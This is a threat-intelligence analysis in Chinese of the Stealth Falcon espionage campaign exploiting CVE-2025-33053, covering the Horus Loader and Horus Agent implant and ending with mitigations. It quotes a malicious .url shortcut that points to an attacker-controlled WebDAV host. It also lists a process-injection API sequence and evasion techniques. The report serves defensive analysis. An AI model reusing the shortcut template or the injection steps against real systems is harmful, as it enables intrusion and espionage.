2 技術分析

2.1 漏洞機制（CVE-2025-33053）

該漏洞利用了 Windows 處理 網際網路捷徑（.url）檔案 的缺陷。當受害者開啟惡意檔案（例如 TLM.005_TELESKOPIK_MAST_HASAR_BILDIRIM_RAPORU.pdf.url ）時，會觸發以下流程： ^[1]

[InternetShortcut]
URL=C:\Program Files\Internet Explorer\iediagcmd.exe
WorkingDirectory=\\summerartcamp[.]net@ssl@443/DavWWWRoot\OSYxaOjr

• 執行劫持 ： WorkingDirectory 參數指向攻擊者控制的 WebDAV 伺服器。正版的 Windows 診斷工具 iediagcmd.exe 會啟動像 route.exe 這樣的程序，但由於操控的工作目錄，導致執行來自惡意 WebDAV 伺服器的 route.exe ，而非 System32 ^[1] 。
• 搜尋順序濫用 ：Windows 的 Process.Start() API 在尋找可執行檔案時，會優先考慮工作目錄。這允許攻擊者用惡意 Payload 取代正版工具（例如 route.exe ） ^[1] 。

2.2 多階段攻擊鏈

階段 1：初始載入器（"Horus Loader"）
來自 WebDAV 伺服器的惡意 route.exe 是一個由 Code Virtualizer 保護的多階段載入器，將程式碼轉換為虛擬機器（VM）指令以阻礙逆向工程。其主要功能包括： ^[1]

• 反分析檢查 ：使用預定義標誌，掃描來自 17 家防毒廠商的 109 個安全程序，若檢測到則終止執行 ^[1] 。
• 誘餌部署 ：從其 .udata 區段解密 PDF 誘餌檔案，寫入 %temp% 並開啟以分散受害者注意力 ^[1] 。
• IPfuscation ：位於 .xdata 的主要 Payload 以 IPv6 位址 形式隱藏，透過 RtlIpv6StringToAddressA() 轉換為 Shellcode ^[1] 。

階段 2：Payload 注入
載入器使用暫停程序將 Shellcode 注入 msedge.exe ： ^[1]

1. 透過 ZwAllocateVirtualMemory 分配記憶體
2. 使用 ZwWriteVirtualMemory 寫入 Payload
3. 透過 GetThreadContext / SetThreadContext 修改執行環境
4. 使用 NtResumeThread 恢復執行

階段 3：Horus Agent 後門
最終 Payload 是 Horus Agent ，一個為 Mythic C2 框架 客制的 C++ 植入程式，採用 OLLVM 混淆控制流程。其獨特功能包括： ^[1]

• 模組化命令集 ：實現 Mythic 標準命令（例如檔案列舉、Shellcode 注入）以及客制功能，如 Survey 用於系統列舉（電池狀態、服務、網路配置） ^[1] 。
• 反鑑識 ：字串使用位移密碼加密（每個位元組減 39），並透過控制流程扁平化阻礙反編譯 ^[1] 。
• 目標驗證 ：初始功能極簡，專注於 Fingerprint 受害者；僅在高價值目標上部署進階 Payload ^[1] 。

表 1：Horus Loader 技術特性

元件	技術	目的
Payload 儲存	IPv6 位址清單（IPfuscation）	規避基於字串的檢測
程序注入	msedge.exe 暫停	偽裝成合法瀏覽器程序
反分析	109 個防毒程序檢查	在受監控環境中終止執行
持久性	無（短暫操作）	減少鑑識足跡

2.3 基礎設施與目標

• 網域 ：惡意 WebDAV 伺服器（例如 summerartcamp[.]net ）托管 Payload ^[1] 。
• 地理焦點(Geographic Focus) ：攻擊集中於土耳其、卡達、埃及和葉門的國防/政府實體 ^[1] 。
• 散佈方式 ：帶有壓縮 .url 附件的魚叉式網路釣魚電子郵件，偽裝成文件（例如軍事裝備報告） ^[1] 。

3 與 Stealth Falcon 更廣泛工具集的關聯

Horus Agent 代表了 Stealth Falcon 早期工具如 Apollo （基於 Mythic 的植入程式）和 Deadglyph 的進化： ^[3]

• Deadglyph 比較 ：ESET 在 2023 年的分析記錄了 Deadglyph，一個從登錄檔鍵載入元件的 .NET/x64 混合後門，使用機器特定的 RC4 鍵。與 Horus 不同，它使用模組化 C2 任務進行程序建立和檔案存取 ^[3][5] 。
• 手法一致性 ：兩者皆使用 同形異意攻擊(Homoglyph attacks) （例如使用 Unicode U+03FA/U+043E 的 "Ϻicrоsоft Corpоratiоn"）和 LOLBins 以規避檢測 ^[1][3] 。

表 2：Stealth Falcon 惡意軟體演進

工具	框架	主要創新	目標
Apollo	Mythic	早期 Mythic 代理客制化	中東活動人士
Deadglyph	.NET/x64 混合	基於登錄檔的元件載入	中東政府
Horus Agent	Mythic（自訂）	IPfuscation、最小命令足跡	國防承包商

4 防禦與緩解建議

1. 修補實施 ：應用 Microsoft 2025 年 6 月修補程式星期二更新（CVE-2025-33053），包括對不支援的作業系統如 Windows 8/Server 2012 的修補，因其正被積極利用 ^[1][6] 。
2. 檢測特徵 ：
   • 監控 .url 檔案啟動 WebDAV 連線（ \\[domain]@ssl@443\DavWWWRoot\ ）。
   • 標記啟動 iediagcmd.exe 或 CustomShellHost.exe 且具有遠端工作目錄的程序 ^[1] 。
3. 零信任控制 ：透過應用程式白名單限制 WebDAV 用戶端執行，並對關鍵資產實施網路分段 ^[1][7] 。
4. 行為分析 ：部署 EDR 解決方案，監控 msedge.exe 產生異常子程序（例如 Shellcode 執行器） ^[1][4] 。

5 結論

Stealth Falcon 對 CVE-2025-33053 的利用展示了利用 Microsoft 工具進行初始存取的精細 Living-off-the-land（LOLBin） 戰術。該組織轉向模組化植入程式如 Horus Agent，強調規避、目標部署和 Mythic 框架整合，與企業導向的零日漏洞利用趨勢一致 ^[1][8] 。防禦者必須優先修補網路第一線的服務，監控 WebDAV 異常，並採用能檢測多階段載入器行為的威脅狩獵框架。如 Google 所述，60% 的企業目標零日漏洞現聚焦於安全/網路工具 ^[2][9] ，使廠商修補敏捷性對基礎設施防禦至關重要。

參考資料

1. Check Point Research. (2025). CVE-2025-33053, Stealth Falcon and Horus: A Saga of Middle Eastern Skies with Deadglyph
2. Google Threat Intelligence Group. (2025). Hello 0-Days, My Old Friend: A 2024 Zero-Day Exploitation Analysis
3. ESET Research. (2023). Stealth Falcon Preying Over Middle Eastern Skies with Deadglyph
4. Dark Reading. (2025). Stealth Falcon APT Exploits Microsoft RCE Zero-Day in Mideast
5. The Hacker News. (2023). Deadglyph: New Advanced Backdoor with Distinctive Evasion Mechanisms
6. SC Media. (2025). Newly Patched Windows Zero-Day Exploited in Stealth Falcon Attack
7. Check Point Blog. (2025). Inside Stealth Falcon’s Espionage Campaign Using a Microsoft Zero-Day
8. Cybersecurity Dive. (2025). Zero-Day Exploitation Drops Slightly from Last Year, Google Report Finds
9. Kiteworks. (2025). Google 2024 Zero-Day Exploitation Analysis: What It Means for Your Data Security